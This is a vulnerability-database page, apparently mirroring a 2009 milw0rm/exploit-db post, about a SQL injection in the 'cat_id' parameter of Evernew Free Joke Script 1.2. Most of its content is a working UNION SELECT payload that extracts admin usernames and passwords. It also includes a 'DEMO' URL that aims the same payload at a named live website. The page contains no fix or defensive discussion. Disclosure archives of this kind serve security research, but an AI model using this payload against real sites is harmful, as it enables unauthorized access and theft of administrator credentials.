Evernew Free Joke Script 1.2 - 'cat_id' SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057848 漏洞类型
发布时间 2009-05-27 更新时间 2009-05-27
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8817
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
@~~=======================================~~@
       ============taRentReXx===================
		  The Indian Hacker
@~~=======================================~~@

@~~=Author   : taRentReXx

@~~=Email    : darkxr00tx@gmail.com

@~~===============INDIAN=================~~@


@~~=======================================~~@
@~~=Script   : Evernewjoke Script

@~~=S.Site   : http://www.evernewscripts.com/2009/02/free-joke-script/

@~~=Demo     : http://www.evernewjokes.com/
@~~=======================================~~@



@~~=Vul file :joke-archives.php

@~~=Exploit :-

		joke-archives.php?start=0&cat_id=-1 union all select 1,2,concat(user,0x3a,password),4,5,0x625920746152656e7452655878,7,8,9,10,11,12,13 from admin--


		!! DEMO !!:-

		http://www.evernewjokes.com/joke-archives.php?start=0&cat_id=-1 union all select 1,2,concat(user,0x3a,password),4,5,0x625920746152656e7452655878,7,8,9,10,11,12,13 from admin--



@~~=======================================~~@
@~~=======================================~~@

Greetz to all muslims brothers.
to all indians
to milw0rm

@~~===============INDIAN=================~~@

# milw0rm.com [2009-05-27]